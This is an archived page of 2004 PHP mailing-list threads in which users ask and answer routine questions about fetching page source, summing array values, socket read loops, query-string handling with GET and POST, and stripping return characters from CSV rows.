> Sent: Friday, December 10, 2004 9:56 AM
> To: [EMAIL PROTECTED]
> Subject: [PHP] grabbing source of a URL
> 
> 
> Hi, I don't know what functions to use so maybe someone can 
> help me out.  
> I want to grab a URL's source (all the code from a link) and 
> then cut out 
> a block of text from it, throw it away, and then show the page.
> 
> For example, if I have page.html with 3 lines:
> 
> hi
> 
> 
> this is line a
> 
> 
> this is line b
> 
> 
> this is line c
> 
> 
> 
> i want my php script to grab the source of page.html, strip out:
> 
> 
> this is line a
> 
> 
> and then display what is left, how would I go about doing 
> this?  I don't 
> know what function to use to grab the page.  for the string 
> to remove, I 
> know I can probably do a str_replace and replace the known code with 
> nothing.
> 
> -- 
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
> 

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


RE: [PHP] grabbing source of a URL

2004-12-10 Thread Vail, Warren
I suspect that you don't really want to cut out everything but the text
(since you plan to display it) but check out;

http://us2.php.net/manual/en/function.strip-tags.php

Now, keep in mind that since you are getting the source from the url, and
I'm guessing that the web server serving up the source will process php
files, this function will probably never see any php in that case, so when
you said "a URL's source" you must have meant "html source" generated by a
php program.

Warren Vail


> -Original Message-
> From: Adam Williams [mailto:[EMAIL PROTECTED] 
> Sent: Friday, December 10, 2004 9:56 AM
> To: [EMAIL PROTECTED]
> Subject: [PHP] grabbing source of a URL
> 
> 
> Hi, I don't know what functions to use so maybe someone can 
> help me out.  
> I want to grab a URL's source (all the code from a link) and 
> then cut out 
> a block of text from it, throw it away, and then show the page.
> 
> For example, if I have page.html with 3 lines:
> 
> hi
> 
> 
> this is line a
> 
> 
> this is line b
> 
> 
> this is line c
> 
> 
> 
> i want my php script to grab the source of page.html, strip out:
> 
> 
> this is line a
> 
> 
> and then display what is left, how would I go about doing 
> this?  I don't 
> know what function to use to grab the page.  for the string 
> to remove, I 
> know I can probably do a str_replace and replace the known code with 
> nothing.
> 
> -- 
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
> 

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



[PHP] array_merge_recursive

2004-12-10 Thread Sebastian
Hi.

I am using this array_merge_recursive to merge two arrays, the array looks
like this:

Array
(
[0] => Array
(
[animal] => Dogs
[total] => 5

)

[1] => Array
(
[animal] => Cats
[total] => 3
)

[2] => Array
(
[animal] => Cats
[total] => 6
)

)

the output i need is:
Dogs 5
Cats 9

I need to add the total but keep just one animal if it's already there. can
someone please help? i been stuck for two days. i appreciate it.

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


Re: [PHP] array_merge_recursive

2004-12-10 Thread Richard Lynch




Sebastian wrote:
> Hi.
>
> I am using this array_merge_recursive to merge two arrays, the array looks
> like this:
>
> Array
> (
> [0] => Array
> (
> [animal] => Dogs
> [total] => 5
>
> )
>
> [1] => Array
> (
> [animal] => Cats
> [total] => 3
> )
>
> [2] => Array
> (
> [animal] => Cats
> [total] => 6
> )
>
> )

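$animals = array(
  array('animal'=>'Dogs', 'total'=>5),
  array('animal'=>'Cats', 'total'=>3),
  array('animal'=>'Cats', 'total'=>6),
);

// Sum the totals per animal name.
$animal_counts = array();
foreach ($animals as $animal_total){
  $animal = $animal_total['animal'];
  $total = $animal_total['total'];
  // Start each animal at 0 so += never reads an undefined index.
  if (!isset($animal_counts[$animal])){
    $animal_counts[$animal] = 0;
  }
  $animal_counts[$animal] += $total;
}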

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] How to make a PHP Socket client crash-proof?

2004-12-10 Thread René Fournier
I managed to solve the problem with the socket client hanging when the 
Server "disappears".

Actually, it is not hanging. What I discovered is that once the other 
end of the connection drops, it starts/continues reading on that socket 
ad infinitum. (I put a little counter in it, and can watch it count 
up). What I did to detect a gone connection, and then restart the 
socket, isn't elegant, doesn't use a socket_select() or non-blocking, 
but it DOES work.

$i = 0;
while(($buf = socket_read($socket,1,PHP_BINARY_READ)) !== false) {
    echo $i." >> \n";
    $i++;
    $data .= $buf;
    if(preg_match("/EOF/",$data)) {
        $msg_recv = 1;
        break;
    }
    if($i>1) {
        $connect = false;
        break;
    }
}

Still, one day I would like to re-architect this. Seems a bit hackish.

...Rene

On 9-Dec-04, at 1:19 PM, Richard Lynch wrote:

> Have you completely eliminated the possibility of having a second,
> independent, completely unrelated client/socket which is used to *SEND*
> data to the server?
>
> client_get <-- server
> client_send ---> server
>
> They can both use your local database to share data, to whatever degree
> you deem necessary, but having one-way sockets for two different scripts
> is way more easier than trying to get a two-way socket to work, in my
> (limited) experience.
>
> If you MUST push forward with a two-way socket, try to determine the state
> of the world inside your infinite loop.  Why aren't you breaking out of
> that loop?  Can you do *anything* to break out?
>
> I suspect that once you have started SENDING data to the server, it's
> going to just keep waiting for you to send more.  How do you signal the
> end of your data to be sent?  Does the server understand that signal?
>
> --
> Like Music?
> http://l-i-e.com/artists.htm

...René
---
René Fournier
www.renefournier.com
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


[PHP] Problems implementing encryption: mcrypt_cfb

2004-12-10 Thread Darren W
Hey, thanks for looking.

I would like to implement some sort of encryption to mask user id's.

I looked at the example on the PHP website:
http://au.php.net/manual/en/function.mcrypt-cfb.php

This is exactly what I need. It does not quite work as the top post in that
page suggests.

Can anyone suggest how to fix this problem (and perhaps also post it under
that section of the php function help) or suggest an alternate solution?

Any help would be appreciated,

Darren

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


[PHP] grabbing source of a URL

2004-12-10 Thread Adam Williams
Hi, I don't know what functions to use so maybe someone can help me out.  
I want to grab a URL's source (all the code from a link) and then cut out 
a block of text from it, throw it away, and then show the page.

For example, if I have page.html with 3 lines:

hi


this is line a


this is line b


this is line c



i want my php script to grab the source of page.html, strip out:


this is line a


and then display what is left, how would I go about doing this?  I don't 
know what function to use to grab the page.  for the string to remove, I 
know I can probably do a str_replace and replace the known code with 
nothing.

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Question:maybe urldecode

2004-12-10 Thread Jason Wong
On Saturday 11 December 2004 00:19, Stuart Felenstein wrote:

>  > > $queryString = ($_SERVER['QUERY_STRING']);
> >
> > What is in $queryString after this? var_dump() it
> > and show us the result.
>
> This is the var_dump of the query string after I've
> made some selections in the page.
> string(80)
> "Ind%5B%5D=2&Ind%5B%5D=3&Ind%5B%5D=4&JTitle=Web&City=&Days=&Recs=15&Submit=
>Submit"

... so your form values are passed in the request URL, looks good.

> > Is it what you expect?  If not, what *did* you
> > expect?
>
> Yes, this is what I expect.
>
> > What is in $_POST before you start the next batch of
> > assignments? var_dump()
>
> Nothing is printing out on $_POST['var'] or $var
> s makes sense.

Now why are you looking in $_POST for your form values? They're in $_GET. You 
said earlier that you understood POST and GET?

> I hope this is clearer with more relevant information.

Yes, much better, concrete data and sequence of events are the kind of 
information that we need.

-- 
Jason Wong -> Gremlins Associates -> www.gremlins.biz
Open Source Software Systems Integrators
* Web Design & Hosting * Internet & Intranet Applications Development *
--
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
--
/*
The devil can cite Scripture for his purpose.
  -- William Shakespeare, "The Merchant of Venice"
*/

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Question:maybe urldecode

2004-12-10 Thread KJ
Just want to double check that you're using the correct array in $_POST!
Are you using ? If not then you should be using 
$_GET, not $_POST.

$_SERVER['REQUEST_METHOD'] will have the method that you are using, 
remember to use the corresponding pre-defined variables.

KJ
Stuart Felenstein wrote:
--- "Ford, Mike" <[EMAIL PROTECTED]> wrote:
 

AARRGGHHH!  Vague, generalized, woolly!!
SHOW US the relevant bits of code.  SHOW US what you
get printed out,
especially anything that isn't what you expect, and
tell us exactly what you
did expect.

SPECIFICS, man, SPECIFICS!!
SHOW US the form -- we can't even begin to guess
what data your script will
see without knowing what the form says.  Preferably
tell us *exactly* what
each control on the form was set to when you
submitted it.

Each element takes the user input and passes it on to
the results page. What I also  want though it to put
the querystring back into the search page and have the
elements echo out the values chosen.
Let me demonstrate with one element:


'.$row['CareerCategories'].'';
} ?>
Now what I've added: $Ind = $_POST['Ind'];

$queryString = ($_SERVER['QUERY_STRING']);
What is in $queryString after this? var_dump() it
and show us the result.

This is the var_dump of the query string after I've
made some selections in the page.
string(80)
"Ind%5B%5D=2&Ind%5B%5D=3&Ind%5B%5D=4&JTitle=Web&City=&Days=&Recs=15&Submit=Submit"

Is it what you expect?  If not, what *did* you
expect?
Yes, this is what I expect.
 

What is in $_POST before you start the next batch of
assignments? var_dump()

Nothing is printing out on $_POST['var'] or $var
s makes sense.
I hope this is clearer with more relevant information.
Stuart 
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
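
An added example (not code from any poster in this thread) of the point both replies make: the values from the quoted var_dump() are in the query string, so they belong to `$_GET`, and they have to be validated and escaped before being echoed back into the search form. The helper names `form_values`, `int_list` and `h` and the category list are assumptions made for the illustration.

```php
<?php
// Constructed sample: the query string shown in the var_dump() quoted above.
$queryString = 'Ind%5B%5D=2&Ind%5B%5D=3&Ind%5B%5D=4&JTitle=Web&City=&Days=&Recs=15&Submit=Submit';

// parse_str() URL-decodes the string and builds the same structure PHP puts
// in $_GET for a method="get" form; "Ind%5B%5D" is "Ind[]", so Ind is an array.
parse_str($queryString, $get);

/** Hypothetical helper: return the input array that matches the request method. */
function form_values(string $method, array $get, array $post): array
{
    return strtoupper($method) === 'POST' ? $post : $get;
}

/** Hypothetical helper: keep only positive integer IDs from a multi-select. */
function int_list($raw): array
{
    $ids = [];
    foreach ((array) $raw as $v) {
        // Non-numeric strings and nested arrays both come back as false.
        $id = filter_var($v, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
        if ($id !== false) {
            $ids[] = $id;
        }
    }
    return $ids;
}

/** Hypothetical helper: escape a value before echoing it into HTML. */
function h($value): string
{
    // A client can send JTitle[]=x to turn the field into an array; treat that as empty.
    return is_string($value) ? htmlspecialchars($value, ENT_QUOTES, 'UTF-8') : '';
}

// In a live script: form_values($_SERVER['REQUEST_METHOD'], $_GET, $_POST).
$values = form_values('GET', $get, []);
$ind    = int_list($values['Ind'] ?? []);

// Constructed category list standing in for the CareerCategories rows.
$categories = [1 => 'Accounting', 2 => 'Engineering', 3 => 'Sales', 4 => 'Support'];

// Re-populate the search form with the submitted choices.
echo "<select name=\"Ind[]\" multiple>\n";
foreach ($categories as $id => $label) {
    $selected = in_array($id, $ind, true) ? ' selected' : '';
    printf("  <option value=\"%d\"%s>%s</option>\n", $id, $selected, h($label));
}
echo "</select>\n";
printf("<input type=\"text\" name=\"JTitle\" value=\"%s\">\n", h($values['JTitle'] ?? ''));
```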


[PHP] Multiple Inheritance

2004-12-10 Thread Chris Boget
What are some of the things you guys do to get around the
fact that classes in php4 can't do multiple inheritance?

thnx,
Chris

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Removing a return character

2004-12-10 Thread John Nichel
Greg Donald wrote:
On Fri, 10 Dec 2004 10:10:20 -, Shaun <[EMAIL PROTECTED]> wrote:
I have a system that scans through a CSV File and inserts each row into a
database. I have just noticed that some rows have a return character in
them - a small square - and this is causing errors in the mysql query.
Does anyone know how I can remove such characters?

You can use one of the string replacement functions, eregi_replace()
for example.  If you're sure it's a return character then \r is what
you want to replace, or it might possibly be \r\n.

rtrim() will take care of all return characters at the end of the line, 
as well as white space.  The 'small square' could be something 
else...some special character.

--
John C. Nichel
ÜberGeek
KegWorks.com
716.856.9675
[EMAIL PROTECTED]
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


Re: [PHP] Removing a return character

2004-12-10 Thread tg-php
All the suggestions made earlier make sense.  You could use a regular 
expression or a str_replace() if you knew what you were looking for.  And as 
someone mentioned, depending on your data set, you might want to use trim() (or 
the left or right variety thereof).

When dealing with a single line of data with "something funky" at the end, I'd 
usually end up using trim() because it removes white spaces, tabs, new lines, 
carriage returns, nulls and tabs from the string and that covers most of what I 
wouldn't want to be displaying or parsing in the projects I've worked on in the 
past.

If there's a chance that you will have any of those characters that you'd WANT 
to keep, then you can go with one of the other methods, or use the option 
parameters for trim() to tell it exactly what to trim.  Again, this will only 
remove items from the beginning and end of the string/line, not the middle.  So 
in some cases, this will be preferable to a str_replace() and simpler than 
using a regex (which could probably emulate trim() or any other replacement 
function... just need to know regex syntax. I think trim() is more intuitive 
for something this simple).

If you're still getting odd stuff, try going through your string and displaying 
the ord() of each character.  This will show you the ascii (decimal) value for 
that character.  If it's not a 32 (white space), 9 (tab), 10 (new line), 13 
(carriage return), 0 (null), or 11 (vertical tab apparently), then you could 
use str_replace or use trim() with its optional parameters to remove the 
offending character.

See the documentation for trim() here for more info:
http://us2.php.net/manual/en/function.trim.php

Good luck!

-TG

= = = Original message = = =

Hi,

I have a system that scans through a CSV File and inserts each row into a 
database. I have just noticed that some rows have a return character in 
them - a small square - and this is causing errors in the mysql query.

Does anyone know how I can remove such characters?


___
Sent by ePrompter, the premier email notification software.
Free download at http://www.ePrompter.com.

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
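
An added example (not code from any poster in this thread) of the ord() inspection and trim() clean-up described in the message above, run over constructed CSV rows. The helper names `control_bytes` and `clean_field` are assumptions made for the illustration.

```php
<?php
// Constructed sample: two CSV rows; the second has a carriage return inside
// a field and a vertical tab at the end of the line.
$rows = [
    "101,Widget,4.50",
    "102,Gad\rget,7.25\x0B",
];

/** Hypothetical helper: map offset => ord() for every control byte in $s. */
function control_bytes(string $s): array
{
    $found = [];
    for ($i = 0, $n = strlen($s); $i < $n; $i++) {
        $code = ord($s[$i]);
        if ($code < 32 || $code === 127) {
            $found[$i] = $code;
        }
    }
    return $found;
}

/** Hypothetical helper: trim() the ends, then drop control bytes left in the middle. */
function clean_field(string $s): string
{
    // Default trim() list: space, tab, new line, carriage return, null, vertical tab.
    $s = trim($s);
    // trim() never touches the middle of the string, so remove what remains there.
    // This also removes embedded tabs; narrow the class if tabs are legitimate data.
    return preg_replace('/[\x00-\x1F\x7F]/', '', $s);
}

foreach ($rows as $rowNo => $line) {
    // The constructed rows contain no quoted fields, so explode() is enough here.
    $fields = explode(',', $line);
    foreach ($fields as $col => $field) {
        foreach (control_bytes($field) as $offset => $code) {
            printf("row %d, column %d: byte %d at offset %d\n", $rowNo, $col, $code, $offset);
        }
        $fields[$col] = clean_field($field);
    }
    echo implode(' | ', $fields), "\n";
}
```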


